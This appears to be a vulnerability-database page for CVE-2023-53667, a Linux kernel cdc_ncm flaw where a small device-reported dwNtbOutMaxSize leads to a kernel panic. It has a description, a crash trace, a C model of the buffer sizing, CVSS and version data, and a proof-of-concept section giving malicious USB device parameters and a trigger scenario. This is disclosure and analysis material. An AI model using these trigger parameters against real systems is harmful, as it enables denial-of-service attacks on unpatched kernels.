Security Vulnerability Report
CVE-2023-53667 CVSS 5.5 MEDIUM

CVE-2023-53667

Published: 2025-10-07 16:15:51
Last Modified: 2026-02-26 23:13:25
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net: cdc_ncm: Deal with too low values of dwNtbOutMaxSize

Currently in cdc_ncm_check_tx_max(), if dwNtbOutMaxSize is lower than the calculated "min" value, but greater than zero, the logic sets tx_max to dwNtbOutMaxSize. This is then used to allocate a new SKB in cdc_ncm_fill_tx_frame() where all the data is handled.

For small values of dwNtbOutMaxSize the memory allocated during alloc_skb(dwNtbOutMaxSize, GFP_ATOMIC) will have the same size, due to how size is aligned at alloc time:
	size = SKB_DATA_ALIGN(size);
	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
Thus we hit the same bug that we tried to squash with commit 2be6d4d16a084 ("net: cdc_ncm: Allow for dwNtbOutMaxSize to be unset or zero")

Low values of dwNtbOutMaxSize do not cause an issue presently because at alloc_skb() time more memory (512b) is allocated than required for the SKB headers alone (320b), leaving some space (512b - 320b = 192b) for CDC data (172b).

However, if more elements (for example 3 x u64 = [24b]) were added to one of the SKB header structs, say 'struct skb_shared_info', increasing its original size (320b [320b aligned]) to something larger (344b [384b aligned]), then suddenly the CDC data (172b) no longer fits in the spare SKB data area (512b - 384b = 128b).

Consequently the SKB bounds checking semantics fails and panics:

skbuff: skb_over_panic: text:ffffffff831f755b len:184 put:172 head:ffff88811f1c6c00 data:ffff88811f1c6c00 tail:0xb8 end:0x80 dev:<NULL>
------------[ cut here ]------------
kernel BUG at net/core/skbuff.c:113!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
CPU: 0 PID: 57 Comm: kworker/0:2 Not tainted 5.15.106-syzkaller-00249-g19c0ed55a470 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/14/2023
Workqueue: mld mld_ifc_work
RIP: 0010:skb_panic net/core/skbuff.c:113 [inline]
RIP: 0010:skb_over_panic+0x14c/0x150 net/core/skbuff.c:118
[snip]
Call Trace:
 <TASK>
 skb_put+0x151/0x210 net/core/skbuff.c:2047
 skb_put_zero include/linux/skbuff.h:2422 [inline]
 cdc_ncm_ndp16 drivers/net/usb/cdc_ncm.c:1131 [inline]
 cdc_ncm_fill_tx_frame+0x11ab/0x3da0 drivers/net/usb/cdc_ncm.c:1308
 cdc_ncm_tx_fixup+0xa3/0x100

Deal with too low values of dwNtbOutMaxSize, clamp it in the range [USB_CDC_NCM_NTB_MIN_OUT_SIZE, CDC_NCM_NTB_MAX_SIZE_TX]. We ensure enough data space is allocated to handle CDC data by making sure dwNtbOutMaxSize is not smaller than USB_CDC_NCM_NTB_MIN_OUT_SIZE.
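The sizing argument in the description, worked through as an added example in userspace C (this is not kernel code and not from the page): it models alloc_skb()'s rounding (SKB_DATA_ALIGN to a 64-byte cache line and kmalloc's power-of-two size classes, both assumptions about the x86-64 build in the trace), a simplified version of how cdc_ncm_check_tx_max() treated a small non-zero dwNtbOutMaxSize before and after the clamp fix, and checks whether the NTH16 + NDP16 header bytes from the trace (12 + 172 = 184, the "len:184 put:172") fit in the resulting data area. The constant values for USB_CDC_NCM_NTB_MIN_OUT_SIZE and CDC_NCM_NTB_MAX_SIZE_TX are restated as plain macros and are assumptions about the header, not included from it.

```c
/* Added example: userspace model of the alloc_skb() sizing in the description.
 * Not kernel code. Assumptions: 64-byte SMP_CACHE_BYTES (x86-64), kmalloc
 * power-of-two size classes, and the cdc_ncm constants restated as macros. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SMP_CACHE_BYTES 64u
#define ALIGN_UP(x, a) (((x) + ((a) - 1u)) & ~((a) - 1u))
#define SKB_DATA_ALIGN(x) ALIGN_UP((x), SMP_CACHE_BYTES)

#define USB_CDC_NCM_NTB_MIN_OUT_SIZE 2048u   /* assumed value, see lead-in */
#define CDC_NCM_NTB_MAX_SIZE_TX 32768u       /* assumed value, see lead-in */

/* NTH16 (12 bytes) + NDP16 for 40 datagrams (8 + 41 * 4 = 172 bytes):
 * together the "len:184 put:172" seen in the trace. */
#define NTH16_SIZE 12u
#define NDP16_SIZE 172u

/* kmalloc rounds a request up to its size class; modelled as next power of two. */
static uint32_t kmalloc_class(uint32_t req)
{
	uint32_t c = 8;
	while (c < req)
		c <<= 1;
	return c;
}

/* Usable data area alloc_skb(len) ends up with, i.e. SKB_WITH_OVERHEAD(ksize(data)),
 * for a build whose struct skb_shared_info has the given size. */
uint32_t skb_data_room(uint32_t len, uint32_t shinfo_size)
{
	uint32_t size = SKB_DATA_ALIGN(len);
	size += SKB_DATA_ALIGN(shinfo_size);
	return kmalloc_class(size) - SKB_DATA_ALIGN(shinfo_size);
}

/* Pre-fix upper bound used for tx_max: a non-zero dwNtbOutMaxSize is taken as-is,
 * however small (zero was already handled by commit 2be6d4d16a084). Simplified. */
uint32_t tx_max_before_fix(uint32_t dwNtbOutMaxSize)
{
	uint32_t max = dwNtbOutMaxSize < CDC_NCM_NTB_MAX_SIZE_TX ? dwNtbOutMaxSize
							      : CDC_NCM_NTB_MAX_SIZE_TX;
	if (max == 0)
		max = CDC_NCM_NTB_MAX_SIZE_TX;
	return max;
}

/* Post-fix: dwNtbOutMaxSize clamped to [USB_CDC_NCM_NTB_MIN_OUT_SIZE, CDC_NCM_NTB_MAX_SIZE_TX]. */
uint32_t tx_max_after_fix(uint32_t dwNtbOutMaxSize)
{
	uint32_t v = dwNtbOutMaxSize;
	if (v < USB_CDC_NCM_NTB_MIN_OUT_SIZE)
		v = USB_CDC_NCM_NTB_MIN_OUT_SIZE;
	if (v > CDC_NCM_NTB_MAX_SIZE_TX)
		v = CDC_NCM_NTB_MAX_SIZE_TX;
	return v;
}

/* 1 if the NTB headers fit in the skb, 0 if skb_put() would trip skb_over_panic(). */
int ntb_headers_fit(uint32_t tx_max, uint32_t shinfo_size)
{
	return skb_data_room(tx_max, shinfo_size) >= NTH16_SIZE + NDP16_SIZE;
}

int main(void)
{
	const uint32_t shinfo[] = { 320, 344 }; /* current size, and the +24 byte case */
	const uint32_t dw = 64;                 /* device-supplied dwNtbOutMaxSize */
	for (size_t i = 0; i < sizeof(shinfo) / sizeof(shinfo[0]); i++) {
		uint32_t before = tx_max_before_fix(dw), after = tx_max_after_fix(dw);
		printf("shinfo=%u: before fix tx_max=%u room=%u fits=%d | after fix tx_max=%u room=%u fits=%d\n",
		       shinfo[i], before, skb_data_room(before, shinfo[i]),
		       ntb_headers_fit(before, shinfo[i]), after,
		       skb_data_room(after, shinfo[i]), ntb_headers_fit(after, shinfo[i]));
	}
	return 0;
}
```

With shinfo at 320 bytes the 64-byte request is rounded to a 512-byte slab object and leaves 192 bytes of room, so the 184 header bytes fit and the bug stays latent; at 344 bytes (aligned to 384) the same request leaves 128 bytes, which is exactly the "end:0x80" in the trace, and skb_put() of the NDP16 overruns it. After the clamp the allocation is at least 2048 bytes regardless of what the device advertises.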

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (version ranges below are taken from the cpeMatch entries in the raw JSON at the end of this page)
Linux Kernel >= 3.16, < 4.14.317
Linux Kernel >= 4.15, < 4.19.285
Linux Kernel >= 4.20, < 5.4.245
Linux Kernel >= 5.5, < 5.10.181
Linux Kernel >= 5.11, < 5.15.114
Linux Kernel >= 5.16, < 6.1.31
Linux Kernel >= 6.2, < 6.3.5
Further cpeMatch entries are cut off where the raw JSON is truncated.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53667 - kernel-side sketch of the cdc_ncm dwNtbOutMaxSize issue.
// This is a fragment meant to be read alongside drivers/net/usb/cdc_ncm.c,
// not a loadable module and not a standalone trigger. The parameters below
// are what a malicious or buggy USB NCM device returns to GET_NTB_PARAMETERS;
// before the fix, cdc_ncm_check_tx_max() accepted a tiny non-zero value as-is.
#include <linux/module.h>
#include <linux/usb.h>
#include <linux/usb/cdc.h>
#include <linux/usb/cdc_ncm.h>
#include <linux/usb/usbnet.h>

// NTB parameters as returned by the device (struct usb_cdc_ncm_ntb_parameters,
// include/uapi/linux/usb/cdc.h). dwNtbOutMaxSize is entirely device-controlled.
static struct usb_cdc_ncm_ntb_parameters ncm_parm = {
	.dwNtbInMaxSize = cpu_to_le32(16384),
	.dwNtbOutMaxSize = cpu_to_le32(64),	// below USB_CDC_NCM_NTB_MIN_OUT_SIZE
	.wNdpOutDivisor = cpu_to_le16(1),
	.wNdpOutPayloadRemainder = cpu_to_le16(0),
};

// What the driver does on transmit: cdc_ncm_tx_fixup() takes the outgoing
// datagram 'skb' and, inside cdc_ncm_fill_tx_frame(), allocates the NTB with
// alloc_skb(ctx->tx_max, GFP_ATOMIC), where tx_max was derived from
// dwNtbOutMaxSize. The NTB skb is allocated by the driver, not by the caller.
static struct sk_buff *trigger_cdc_ncm_tx(struct usbnet *dev, struct sk_buff *skb)
{
	// With tx_max = 64 the NTB data area is 64 bytes rounded up by the
	// allocator; cdc_ncm_ndp16() then skb_put_zero()s the 172-byte NDP16.
	// Whether that trips skb_over_panic() depends on the slack kmalloc leaves
	// after SKB_DATA_ALIGN(sizeof(struct skb_shared_info)), see description.
	return cdc_ncm_tx_fixup(dev, skb, GFP_ATOMIC);
}

// Scenario (as the description states it; not a demonstrated exploit):
// 1. A malicious or buggy USB CDC NCM device is attached (physical access).
// 2. Its NTB parameters report dwNtbOutMaxSize = 64.
// 3. Pre-fix cdc_ncm_check_tx_max() sets tx_max = 64 because it is non-zero.
// 4. On the first transmit, cdc_ncm_fill_tx_frame() calls alloc_skb(64, ...).
// 5. skb_put() in cdc_ncm_ndp16() exceeds the data area only when the
//    allocator slack is smaller than NTH16 + NDP16 (12 + 172 bytes); today a
//    512-byte object leaves 192 bytes and the bug stays latent, but a larger
//    skb_shared_info would leave 128. skb_over_panic() then calls BUG(), so
//    the impact is a kernel panic (denial of service), not a silent overwrite.
//
// Kernel panic output from the report:
// skbuff: skb_over_panic: text:ffffffff831f755b len:184 put:172
// head:ffff88811f1c6c00 data:ffff88811f1c6c00 tail:0xb8 end:0x80
// kernel BUG at net/core/skbuff.c:113!
// RIP: skb_over_panic+0x14c/0x150 net/core/skbuff.c:118

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2023-53667",
    "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "published": "2025-10-07T16:15:50.513",
    "lastModified": "2026-02-26T23:13:24.757",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: cdc_ncm: Deal with too low values of dwNtbOutMaxSize\n\nCurrently in cdc_ncm_check_tx_max(), if dwNtbOutMaxSize is lower than\nthe calculated \"min\" value, but greater than zero, the logic sets\ntx_max to dwNtbOutMaxSize. This is then used to allocate a new SKB in\ncdc_ncm_fill_tx_frame() where all the data is handled.\n\nFor small values of dwNtbOutMaxSize the memory allocated during\nalloc_skb(dwNtbOutMaxSize, GFP_ATOMIC) will have the same size, due to\nhow size is aligned at alloc time:\n\tsize = SKB_DATA_ALIGN(size);\n size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));\nThus we hit the same bug that we tried to squash with\ncommit 2be6d4d16a084 (\"net: cdc_ncm: Allow for dwNtbOutMaxSize to be unset or zero\")\n\nLow values of dwNtbOutMaxSize do not cause an issue presently because at\nalloc_skb() time more memory (512b) is allocated than required for the\nSKB headers alone (320b), leaving some space (512b - 320b = 192b)\nfor CDC data (172b).\n\nHowever, if more elements (for example 3 x u64 = [24b]) were added to\none of the SKB header structs, say 'struct skb_shared_info',\nincreasing its original size (320b [320b aligned]) to something larger\n(344b [384b aligned]), then suddenly the CDC data (172b) no longer\nfits in the spare SKB data area (512b - 384b = 128b).\n\nConsequently the SKB bounds checking semantics fails and panics:\n\nskbuff: skb_over_panic: text:ffffffff831f755b len:184 put:172 head:ffff88811f1c6c00 data:ffff88811f1c6c00 tail:0xb8 end:0x80 dev:<NULL>\n------------[ cut here ]------------\nkernel BUG at net/core/skbuff.c:113!\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN\nCPU: 0 PID: 57 Comm: kworker/0:2 Not tainted 5.15.106-syzkaller-00249-g19c0ed55a470 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/14/2023\nWorkqueue: mld mld_ifc_work\nRIP: 0010:skb_panic net/core/skbuff.c:113 [inline]\nRIP: 0010:skb_over_panic+0x14c/0x150 net/core/skbuff.c:118\n[snip]\nCall Trace:\n <TASK>\n skb_put+0x151/0x210 net/core/skbuff.c:2047\n skb_put_zero include/linux/skbuff.h:2422 [inline]\n cdc_ncm_ndp16 drivers/net/usb/cdc_ncm.c:1131 [inline]\n cdc_ncm_fill_tx_frame+0x11ab/0x3da0 drivers/net/usb/cdc_ncm.c:1308\n cdc_ncm_tx_fixup+0xa3/0x100\n\nDeal with too low values of dwNtbOutMaxSize, clamp it in the range\n[USB_CDC_NCM_NTB_MIN_OUT_SIZE, CDC_NCM_NTB_MAX_SIZE_TX]. We ensure\nenough data space is allocated to handle CDC data by making sure\ndwNtbOutMaxSize is not smaller than USB_CDC_NCM_NTB_MIN_OUT_SIZE."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-476"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.16", "versionEndExcluding": "4.14.317", "matchCriteriaId": "D58CAFE5-010D-4B7E-87DE-47F077D0AB6E"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.285", "matchCriteriaId": "286C59EF-E841-4ED4-8EBC-3886E88D5A6F"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.245", "matchCriteriaId": "3571627D-1A0A-4EAA-9F5E-58080584055F"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.181", "matchCriteriaId": "F5B1726B-45AA-47F2-9261-6DC963E92248"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.114", "matchCriteriaId": "AA68825D-6B30-4C99-9E36-C690FE7F9AB3"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.31", "matchCriteriaId": "79A1436B-7738-4A85-8FE6-B844059F22D0"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.5", "matchCriteriaId": "34DD94CA-4DA1-41C3-9A9B-92ACD7F4E240"},
              {"vulnerable": true ... (truncated)